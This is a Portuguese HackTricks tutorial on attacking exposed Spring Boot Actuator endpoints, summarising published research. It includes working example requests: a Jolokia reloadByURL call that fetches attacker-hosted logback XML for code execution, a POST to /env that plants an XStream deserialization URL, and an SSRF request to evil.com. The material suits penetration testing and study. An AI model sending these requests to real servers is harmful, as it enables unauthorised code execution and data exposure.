HackTricksSpring Actuators
Reading time: 3 minutes
tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao š¬ grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter š¦ @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositĆ³rios do github.
Spring Auth Bypass
.png)
De https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Explorando Spring Boot Actuators
Ver a postagem original em [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Pontos Chave:
- Spring Boot Actuators registram endpoints como
/health,/trace,/beans,/env, etc. Nas versƵes 1 a 1.4, esses endpoints sĆ£o acessĆveis sem autenticaĆ§Ć£o. A partir da versĆ£o 1.5, apenas/healthe/infosĆ£o nĆ£o sensĆveis por padrĆ£o, mas os desenvolvedores frequentemente desativam essa seguranƧa. - Certos endpoints do Actuator podem expor dados sensĆveis ou permitir aƧƵes prejudiciais:
/dump,/trace,/logfile,/shutdown,/mappings,/env,/actuator/env,/restart, e/heapdump.- No Spring Boot 1.x, os actuators sĆ£o registrados sob a URL raiz, enquanto no 2.x, eles estĆ£o sob o caminho base
/actuator/.
TĆ©cnicas de ExploraĆ§Ć£o:
- ExecuĆ§Ć£o Remota de CĆ³digo via '/jolokia':
- O endpoint do actuator
/jolokiaexpƵe a Biblioteca Jolokia, que permite acesso HTTP a MBeans. - A aĆ§Ć£o
reloadByURLpode ser explorada para recarregar configuraƧƵes de log a partir de uma URL externa, o que pode levar a XXE cego ou ExecuĆ§Ć£o Remota de CĆ³digo via configuraƧƵes XML manipuladas. - URL de exemplo para exploraĆ§Ć£o:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
- ModificaĆ§Ć£o de ConfiguraĆ§Ć£o via '/env':
- Se as Bibliotecas Spring Cloud estiverem presentes, o endpoint
/envpermite a modificaĆ§Ć£o de propriedades ambientais. - Propriedades podem ser manipuladas para explorar vulnerabilidades, como a vulnerabilidade de desserializaĆ§Ć£o XStream no Eureka serviceURL.
- Exemplo de requisiĆ§Ć£o POST para exploraĆ§Ć£o:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Outras ConfiguraƧƵes Ćteis:
- Propriedades como
spring.datasource.tomcat.validationQuery,spring.datasource.tomcat.url, espring.datasource.tomcat.max-activepodem ser manipuladas para vĆ”rias exploraƧƵes, como injeĆ§Ć£o SQL ou alteraĆ§Ć£o de strings de conexĆ£o de banco de dados.
InformaƧƵes Adicionais:
- Uma lista abrangente de actuators padrĆ£o pode ser encontrada aqui.
- O endpoint
/envno Spring Boot 2.x usa formato JSON para modificaĆ§Ć£o de propriedades, mas o conceito geral permanece o mesmo.
TĆ³picos Relacionados:
- Env + H2 RCE:
- Detalhes sobre a exploraĆ§Ć£o da combinaĆ§Ć£o do endpoint
/enve do banco de dados H2 podem ser encontrados aqui.
- SSRF no Spring Boot AtravĆ©s da InterpretaĆ§Ć£o Incorreta de Nomes de Caminho:
- O manuseio de parĆ¢metros de matriz (
;) pelo framework Spring em nomes de caminho HTTP pode ser explorado para Server-Side Request Forgery (SSRF). - Exemplo de requisiĆ§Ć£o de exploraĆ§Ć£o:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
tip
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao š¬ grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter š¦ @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositĆ³rios do github.